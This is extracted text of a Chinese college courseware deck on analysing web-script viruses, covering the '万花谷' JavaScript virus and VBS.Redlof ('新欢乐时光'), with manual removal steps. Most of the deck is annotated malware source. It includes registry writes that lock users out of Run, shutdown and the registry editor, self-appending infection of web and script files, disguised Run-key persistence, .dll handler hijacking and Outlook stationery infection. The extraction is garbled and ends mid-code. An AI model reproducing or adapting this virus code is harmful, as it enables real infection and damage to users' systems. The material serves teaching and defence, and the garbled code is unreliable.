典型网页病毒剖析课件.ppt

1、Virus重庆电子工程职业学院重庆电子工程职业学院计算机病毒与防治课程小组教学单元3-4 网页脚本病毒防治 万花谷病毒的手工清除 万花谷病毒特点及代码分析 梅丽莎病毒特点及代码分析第二讲第二讲 典型网页病毒剖析典型网页病毒剖析计算机病毒与防治课程小组 梅丽莎病毒的手工清除万花谷病毒特点计算机病毒与防治课程小组病毒类型 网页脚本病毒危险级别 影响系统 Win 9X/ME/NT/2000/XP/2003Win 9X/ME/NT/2000/XP/2003 万花谷病毒特点病毒名称:万花谷万花谷病毒特点计算机病毒与防治课程小组曾经在互连网上散发过一个美丽诱人的网址“万花谷”，这实际是一个恶意“陷阱”，有

2、人经不住诱惑，只用鼠标轻轻点一下，计算机就立即瘫痪了，这是有人利用Java最新技术进行破坏的一个恶意网址。本病毒是在页面中嵌入了恶意的JavaScript代码，它最初出现在 http:/ 个人网站上，随后其他一些个人主页也模仿或被感染了该病毒代码。万花谷病毒特点万花谷病毒特点计算机病毒与防治课程小组其破坏特性如下：(1)用户不能正常使用WINDOWS的DOS功能程序；(2)用户不能正常退出WINDOWS；(3)开始菜单上的关闭系统、运行等栏目被屏蔽，防止用户重新以DOS方式启动，关闭DOS命令、关闭REGEDIT命令等。(4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。

3、具体的表现形式是：(1)网络地址是：；(2)在IE的“收藏夹”中自动加上“万花谷”的快捷方式,网络地址是：http:/；万花谷病毒特点万花谷病毒源码分析计算机病毒与防治课程小组document.write();function AddFavLnk(loc,DispName,SiteURL)var Shor=Shl.CreateShortcut(loc+DispName+.URL);Shor.TargetPath=SiteURL;Shor.Save();function f()Try /ActiveX initialization a1=document.applets0;a1.setCLSID

4、(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B);a1.createInstance();Shl=a1.GetObject();a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228);a1.createInstance();FSO=a1.GetObject();a1.setCLSID(F935DC26-1CF0-11D0-ADB9-00C04FD58A0B);a1.createInstance();Net=a1.GetObject();万花谷病毒源码分析计算机病毒与防治课程小组try if(documents.cookie

5、s.indexOf(Chg)=-1)/以下内容是对注册表进行修改Shl.RegWrite(HKCUSoftwareMicrosoftInternet ExplorerMainStart Page,http:/ expdate=new Date(new Date().getTime()+(1);documents.cookies=Chg=general;expires=+expdate.toGMTString()+;path=/;/设置IE主页Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun,

6、01,REG_BINARY);/消除RUN按纽Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose,01,REG_BINARY);/消除关闭按纽Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff,01,REG_BINARY);/消除注销按纽Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoD

7、rives,63000000,REG_DWord);/隐藏盘符万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools,00000001,REG_DWORD);/禁止注册表编辑器Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop,00000001,REG_DWORD);/屏蔽所有桌面图标Shl.RegWrite(HKCUSo

8、ftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled,00000001,REG_DWORD);/禁止运行Dos程序Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode,00000001,REG_DWORD);/屏蔽所有桌面图标Shl.RegWrite(HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption,您的计算机已经被http:/

9、hack.org/优化:）);/设置开机提示Shl.RegWrite(HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText,您的计算机已经被http:/hack.org/优化:）);/弹出窗口中的内容万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWrite(HKLMSoftwareMicrosoftInternet ExplorerMainWindow Title,新的标题http:/ ExplorerMainWindow Title,新的标题http:/ var expdate=new Date(new

10、Date().getTime()+(1);documents.cookies=Chg=general;expires=+expdate.toGMTString()+;path=/;catch(e)catch(e)function init()setTimeout(f(),1000);init();万花谷病毒发作现象计算机病毒与防治课程小组万花谷病毒发作部分现象截图未中万花谷病毒时截图万花谷病毒手工清除计算机病毒与防治课程小组方法一(利用 Windows 提供的恢复注册表功能)：在“开始-运行”中输入Regedit命令，打开注册表编辑器，点选“文件”菜单下的“导入”命令，选择以前备份的注册表文件

11、，确定即可完成注册表的还原。方法二(采用 VBS 或 JS 脚本来删除或修改注册表项)：进入系统后打开记事本，输入以下内容：万花谷病毒手工清除计算机病毒与防治课程小组Dim R Set R=CreateObject(WScript.Shell)Rem Write Regedit R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun,0,REG_BINARY ；修复RUN按纽R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExp

12、lorerNoClose,0,REG_BINARY ；修复关闭按纽R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff,0,REG_BINARY ；修复注销按纽R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives,00000000,REG_DWORD ；取消隐藏盘符R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSyst

13、emDisableRegistryTools,00000000,REG_DWORD；取消禁止注册表R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop“,”00000000“,”REG_DWORD“；万花谷病毒手工清除R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled,00000000,REG_DWORD R.RegWrite HKCUSoftwareMicrosoftWindowsCu

14、rrentVersionPoliciesWinOldAppNoRealMode,00000000,REG_DWORD R.RegWrite HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption,REG_SZ R.RegWrite HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText,REG_SZ ；重设开机提示R.RegWrite“HKLMSoftwareMicrosoftInternet ExplorerMainWindowTitl

15、e”,“”,REG_SZ ；重设IE标题R.RegWrite HKCUSoftwareMicrosoftInternet ExplorerMainStartPage,REG_SZ“以文件名“RegClean.vbs”存盘后双击运行该文件。重新启动计算机即完成系统恢复。计算机病毒与防治课程小组新欢乐时光病毒特点病毒名称：新欢乐时光病毒类型：网页脚本病毒危险级别：影响系统：Win 9X/ME/NT/2000Win 9X/ME/NT/2000 英文名包括有：HTML.Redlof.A Symantec,VBS.Redlof AVP,VBS_REDLOF.A Trend,VBS/Redlof-A So

16、phos,VBS.KJ 金山,Script.RedLof 瑞星,VBS/KJ 江民计算机病毒与防治课程小组新欢乐时光病毒特点新欢乐时光病毒特点新欢乐时光病毒是一个多变形、加密病毒，感染扩展名为.html,.htm,.asp,.php,.jsp,.htt和.vbs文件，同时该病毒会大量生成folder.htt和desktop.ini，并在%windir%System中生成一个名字叫Kernel.dll（Windows 9x/Me）或kernel32.dll（Windows NT/2000）的文件，修改.dll文件的打开方式，感染Outlook的信纸文件。感染这个病毒后有两个明显的特征：a.在每个

17、目录中都会生成folder.htt（带毒文件）和desktop.ini（目录配置文件）；b.电脑运行速度明显变慢，在任务列表中可以看到有大量的Wscript.exe程序在运行。计算机病毒与防治课程小组新欢乐时光病毒特点新欢乐时光病毒这个网页病毒利用微软IE的漏洞，通过感染一些.html,.htm,.asp,.php,.jsp,.htt和.vbs等文件进行传播。然而由于病毒的本身特性，其传播的途径也有多种：a.通过网页传播。由于病毒会感染网页文件，如果那些网站站长不小心将带毒的网页放到网站上，用户不小心浏览了这些网页就会被病毒感染了；b.通过局域网。当本地计算机设有可写权限的共享目录，或者访问局

18、域网上带毒的计算机的时候就会感染病毒；对于Windows NT/2000系统，由于存在默认的管理用共享目录，因此，管理员的疏忽也可能会造成感染。c.通过电子邮件。如果发件人使用了带毒的网页文件作为信纸，或者信件中有带毒的网页文件，那么，只要收件人浏览了邮件，也会被感染病毒；d.通过移动介质，如软盘、移动硬盘、光盘等。由于病毒会生成folder.htt和desktop.ini，所以在打开移动介质或打开其文件夹的时候，就会激活并感染病毒。计算机病毒与防治课程小组新欢乐时光代码分析Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsSh

19、ell,WinPath,SubE,FinalyDisk Sub KJ_start()初始化变量 KJSetDim()初始化环境 KJCreateMilieu()感染本地或者共享上与html所在目录 KJLikeIt()通过vbs感染Outlook邮件模板 KJCreateMail()进行病毒传播 KJPropagate()End Sub 计算机病毒与防治课程小组新欢乐时光病毒主运行程序代码新欢乐时光代码分析Function KJAppendTo(FilePath,TypeStr)On Error Resume Next 以只读方式打开指定文件 Set ReadTemp=FSO.OpenText

20、File(FilePath,1)将文件内容读入到TmpStr变量中 TmpStr=ReadTemp.ReadAll 判断文件中是否存在“KJ_start()”字符串，若存在说明已经感染，退出函数；若文件长度小于1，也退出函数。If Instr(TmpStr,KJ_start()0 Or Len(TmpStr)1 Then ReadTemp.Close Exit Function End If 如果传过来的类型是“htt“，在文件头加上调用页面的时候加载KJ_start()函数;在文件尾追加html版本的加密病毒体。如果是”html”:在文件尾追加调用页面的时候加载KJ_start()函数和ht

21、ml版本的病毒体;如果是vbs:在文件尾追加vbs版本的病毒体 If TypeStr=htt Then ReadTemp.Close Set FileTemp=FSO.OpenTextFile(FilePath,2)FileTemp.Write&vbCrLf&TmpStr&vbCrLf&HtmlText 函数功能：向指定类型的指定文件追加病毒计算机病毒与防治课程小组FileTemp.Close Set FAttrib=FSO.GetFile(FilePath)FAttrib.attributes=34 Else ReadTemp.Close Set FileTemp=FSO.OpenTextF

22、ile(FilePath,8)If TypeStr=html Then FileTemp.Write vbCrLf&vbCrLf&vbCrLf&HtmlText ElseIf TypeStr=vbs Then FileTemp.Write vbCrLf&VbsText End If FileTemp.Close End If End Function 新欢乐时光代码分析计算机病毒与防治课程小组新欢乐时光代码分析计算机病毒与防治课程小组函数功能：改变子目录以及盘符Function KJChangeSub(CurrentString,LastIndexChar)判断是否是根目录 If LastIn

23、dexChar=0 Then 如果是根目录：如果是C:，返回FinalyDisk盘，并将SubE置为0 如果不是C:，返回将当前盘符递减1，并将SubE置为0 If Left(LCase(CurrentString),1)=LCase(c)Then KJChangeSub=FinalyDisk&:SubE=0 Else KJChangeSub=Chr(Asc(Left(LCase(CurrentString),1)-1)&:SubE=0 End If Else 如果不是根目录，则返回上一级目录名称 KJChangeSub=Mid(CurrentString,1,LastIndexChar)En

24、d If End Function 新欢乐时光代码分析计算机病毒与防治课程小组Function KJCreateMail()On Error Resume Next 如果当前执行文件是html的，就退出函数 If InWhere=html Then Exit Function End If 取系统盘的空白页的路径ShareFile=Left(WinPath,3)&Program FilesCommon FilesMicrosoft SharedStationeryblank.htm 如果存在这个文件，就向其追加病毒体,否则生成含有病毒体的文件 If(FSO.FileExists(ShareFi

25、le)Then Call KJAppendTo(ShareFile,html)Else Set FileTemp=FSO.OpenTextFile(ShareFile,2,true)FileTemp.Write&vbCrLf&vbCrLf&HtmlText FileTemp.Close End If 功能：感染邮件部分 新欢乐时光代码分析计算机病毒与防治课程小组 取得当前用户的ID和OutLook的版本 DefaultId=WsShell.RegRead(HKEY_CURRENT_USERIdentitiesDefault User ID)OutLookVersion=WsShell.RegR

26、ead(HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressMediaVer)激活信纸功能，并感染所有信纸 WsShell.RegWrite HKEY_CURRENT_USERIdentities&DefaultId&SoftwareMicrosoftOutlook Express&Left(OutLookVersion,1)&.0MailCompose Use Stationery,1,REG_DWORD Call KJMailReg(HKEY_CURRENT_USERIdentities&DefaultId&SoftwareMicrosoft

27、Outlook Express&Left(OutLookVersion,1)&.0MailStationery Name,ShareFile)Call KJMailReg(HKEY_CURRENT_USERIdentities&DefaultId&SoftwareMicrosoftOutlook Express&Left(OutLookVersion,1)&.0MailWide Stationery Name,ShareFile)新欢乐时光代码分析计算机病毒与防治课程小组WsShell.RegWrite HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0Ou

28、tlookOptionsMailEditorPreference,131072,REG_DWORD Call KJMailReg(HKEY_CURRENT_USERSoftwareMicrosoftWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings0a0d020000000000c000000000000046001e0360,blank)Call KJMailReg(HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindows Mes

29、saging SubsystemProfilesMicrosoft Outlook Internet Settings0a0d020000000000c000000000000046001e0360,blank)WsShell.RegWrite HKEY_CURRENT_USERSoftwareMicrosoftOffice10.0OutlookOptionsMailEditorPreference,131072,REG_DWORD Call KJMailReg(HKEY_CURRENT_USERSoftwareMicrosoftOffice10.0CommonMailSettingsNewS

30、tationery,blank)KJummageFolder(Left(WinPath,3)&Program FilesCommon FilesMicrosoft SharedStationery)End Function 新欢乐时光代码分析计算机病毒与防治课程小组Function KJCreateMilieu()On Error Resume Next TempPath=判断操作系统是NT/2000还是9X If Not(FSO.FileExists(WinPath&WScript.exe)Then TempPath=system32 End If 为了文件名起到迷惑性，并且不会与系统文件冲

31、突。如果是NT/2000则启动文件为systemKernel32.dll，如果是9x启动文件则为systemKernel.dll If TempPath=system32 Then StartUpFile=WinPath&SYSTEMKernel32.dll Else StartUpFile=WinPath&SYSTEMKernel.dll End If 添加Run值，添加刚才生成的启动文件路径 WsShell.RegWrite HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunKernel32,StartUpFile 功能：

32、创建系统环境 新欢乐时光代码分析计算机病毒与防治课程小组 拷贝前期备份的文件到原来的目录 FSO.CopyFile WinPath&webkjwall.gif,WinPath&webFolder.htt FSO.CopyFile WinPath&system32kjwall.gif,WinPath&system32desktop.ini 向%windir%webFolder.htt追加病毒体 Call KJAppendTo(WinPath&webFolder.htt,htt)改变dll的MIME头,改变dll的默认图标,改变dll的打开方式WsShell.RegWrite HKEY_CLASS

33、ES_ROOT.dll,dllfile WsShell.RegWrite HKEY_CLASSES_ROOT.dllContent Type,application/x-msdownload WsShell.RegWrite HKEY_CLASSES_ROOTdllfileDefaultIcon,WsShell.RegRead(HKEY_CLASSES_ROOTvxdfileDefaultIcon)WsShell.RegWrite HKEY_CLASSES_ROOTdllfileScriptEngine,VBScript WsShell.RegWrite HKEY_CLASSES_ROOTdl

34、lFileShellOpenCommand,WinPath&TempPath&WScript.exe%1%*新欢乐时光代码分析计算机病毒与防治课程小组WsShell.RegWrite HKEY_CLASSES_ROOTdllFileShellExPropertySheetHandlersWSHProps,60254CA5-953B-11CF-8C96-00AA00B8708C WsShell.RegWrite HKEY_CLASSES_ROOTdllFileScriptHostEncode,85131631-480C-11D2-B1F9-00C04F86C324 启动时加载的病毒文件中写入病毒

35、体 Set FileTemp=FSO.OpenTextFile(StartUpFile,2,true)FileTemp.Write VbsText FileTemp.Close End Function 新欢乐时光代码分析计算机病毒与防治课程小组功能：针对html文件进行处理，如果访问的是本地的或者共享上的文件，感染目录 Function KJLikeIt()如果当前执行文件不是html的就退出程序 If InWhere html Then Exit Function End If ThisLocation=document.location 取得文档当前路径 If Left(ThisLoca

36、tion,4)=“file”Then 如果是本地或网上共享文件 ThisLocation=Mid(ThisLocation,9)如果这个文件扩展名不为空，在ThisLocation中保存它的路径 If FSO.GetExtensionName(ThisLocation)then ThisLocation=Left(ThisLocation,Len(ThisLocation)-Len(FSO.GetFileName(ThisLocation)End If If Len(ThisLocation)3 Then 如果ThisLocation的长度大于3就尾追一个 ThisLocation=ThisL

37、ocation&End If KJummageFolder(ThisLocation)感染这个目录 End If End Function 新欢乐时光代码分析计算机病毒与防治课程小组功能：如果注册表指定键值不存在，则向指定位置写入指定文件名Function KJMailReg(RegStr,FileName)On Error Resume Next 如果注册表指定键值不存在，则向指定位置写入指定文件名 RegTempStr=WsShell.RegRead(RegStr)If RegTempStr=Then WsShell.RegWrite RegStr,FileName End If End

38、Function 新欢乐时光代码分析计算机病毒与防治课程小组功能：遍历并返回目录路径Function KJOboSub(CurrentString)SubE=0 TestOut=0 Do While True TestOut=TestOut+1 If TestOut 28 Then CurrentString=FinalyDisk&:Exit Do End If On Error Resume Next 取得当前目录的所有子目录，并且放到字典中 Set ThisFolder=FSO.GetFolder(CurrentString)Set DicSub=CreateObject(Scriptin

39、g.Dictionary)Set Folders=ThisFolder.SubFolders FolderCount=0For Each TempFolder in Folders FolderCount=FolderCount+1 DicSub.add FolderCount,TempFolder.Name Next 新欢乐时光代码分析计算机病毒与防治课程小组 如果没有子目录了，就调用KJChangeSub返回上一级目录或者更换盘符，并将SubE置1 If DicSub.Count=0 Then LastIndexChar=InstrRev(CurrentString,Len(Current

40、String)-1)SubString=Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)CurrentString=KJChangeSub(CurrentString,LastIndexChar)SubE=1 Else 如果存在子目录 如果SubE为0，则将CurrentString变为它的第1个子目录If SubE=0 Then CurrentString=CurrentString&DicSub.Item(1)&Exit Do Else 如果SubE为1，继续遍历子目录，并将下一个子目录返回 j=0

41、新欢乐时光代码分析计算机病毒与防治课程小组For j=1 To FolderCount If LCase(SubString)=LCase(DicSub.Item(j)Then If j FolderCount Then CurrentString=CurrentString&DicSub.Item(j+1)&Exit DoEnd If End IfNext LastIndexChar=InstrRev(CurrentString,Len(CurrentString)-1)SubString=Mid(CurrentString,LastIndexChar+1,Len(CurrentString

42、)-LastIndexChar-1)CurrentString=KJChangeSub(CurrentString,LastIndexChar)End If End If Loop KJOboSub=CurrentString End Function 新欢乐时光代码分析计算机病毒与防治课程小组功能：病毒传播Function KJPropagate()On Error Resume NextRegPathvalue=HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressDegree DiskDegree=WsShell.RegRead(RegPat

43、hvalue)如果不存在Degree这个键值，DiskDegree则为FinalyDisk盘 If DiskDegree=Then DiskDegree=FinalyDisk&:End If 继DiskDegree置后感染5个目录 For i=1 to 5 DiskDegree=KJOboSub(DiskDegree)KJummageFolder(DiskDegree)Next 将感染记录保存在HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressDegree键值中 WsShell.RegWrite RegPathvalue,DiskDegree

44、End Function 新欢乐时光代码分析计算机病毒与防治课程小组功能：感染指定目录Function KJummageFolder(PathName)On Error Resume Next 取得目录中的所有文件集 Set FolderName=FSO.GetFolder(PathName)Set ThisFiles=FolderName.Files HttExists=0 For Each ThisFile In ThisFiles FileExt=UCase(FSO.GetExtensionName(ThisFile.Path)判断扩展名 若是HTM,HTML,ASP,PHP,JSP则向

45、文件中追加HTML版的病毒体 若是VBS则向文件中追加VBS版的病毒体 若是HTT,则标志为已经存在HTT了 If FileExt=HTM Or FileExt=HTML Or FileExt=ASP Or FileExt=PHP Or FileExt=JSP Then Call KJAppendTo(ThisFile.Path,html)ElseIf FileExt=VBS ThenCall KJAppendTo(ThisFile.Path,vbs)ElseIf FileExt=HTT Then HttExists=1 End IfNext 新欢乐时光代码分析计算机病毒与防治课程小组 如果所

46、给的路径是桌面，则标志为已经存在HTT了 If(UCase(PathName)=UCase(WinPath&Desktop)Or(UCase(PathName)=UCase(WinPath&Desktop)Then HttExists=1 End If 如果不存在HTT 向目录中追加病毒体 If HttExists=0 Then FSO.CopyFile WinPath&system32desktop.ini,PathName FSO.CopyFile WinPath&webFolder.htt,PathName End If End Function 新欢乐时光代码分析计算机病毒与防治课程小

47、组功能：定义FSO,WsShell对象,取得最后一个可用磁盘卷标,生成传染用的加密字串 备份系统中的webfolder.htt和system32desktop.ini Function KJSetDim()On Error Resume Next Err.Clear 测试当前执行文件是html还是vbs TestIt=WScript.ScriptFullname If Err Then InWhere=html Else InWhere=vbs End If 创建文件访问对象和Shell对象If InWhere=vbs Then Set FSO=CreateObject(Scripting.F

48、ileSystemObject)Set WsShell=CreateObject(WScript.Shell)Else 新欢乐时光代码分析计算机病毒与防治课程小组Set AppleObject=document.applets(KJ_guest)AppleObject.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B)AppleObject.createInstance()Set WsShell=AppleObject.GetObject()AppleObject.setCLSID(0D43FE01-F093-11CF-8940-00A0C905422

49、8)AppleObject.createInstance()Set FSO=AppleObject.GetObject()End If Set DiskObject=FSO.Drives 判断磁盘类型 0:Unknown,1:Removable,2:Fixed,3:Network,4:CD-ROM,5:RAM Disk 如果不是可移动磁盘或者固定磁盘就跳出循环。可能作者考虑的是网络磁盘、CD-ROM、RAM Disk都是在比较靠后的位置。呵呵，如果C:是RAMDISK会怎么样？For Each DiskTemp In DiskObjectIf DiskTemp.DriveType 2 And

50、DiskTemp.DriveType 1 Then Exit For End IfFinalyDisk=DiskTemp.DriveLetter Next 新欢乐时光代码分析计算机病毒与防治课程小组 此前的这段病毒体已经解密，并且存放在ThisText中，现在为了传播，需要对它进行再加密。Dim OtherArr(3)Randomize 随机生成4个算子 For i=0 To 3 OtherArr(i)=Int(9*Rnd)Next TempString=For i=1 To Len(ThisText)TempNum=Asc(Mid(ThisText,i,1)If TempNum=13 The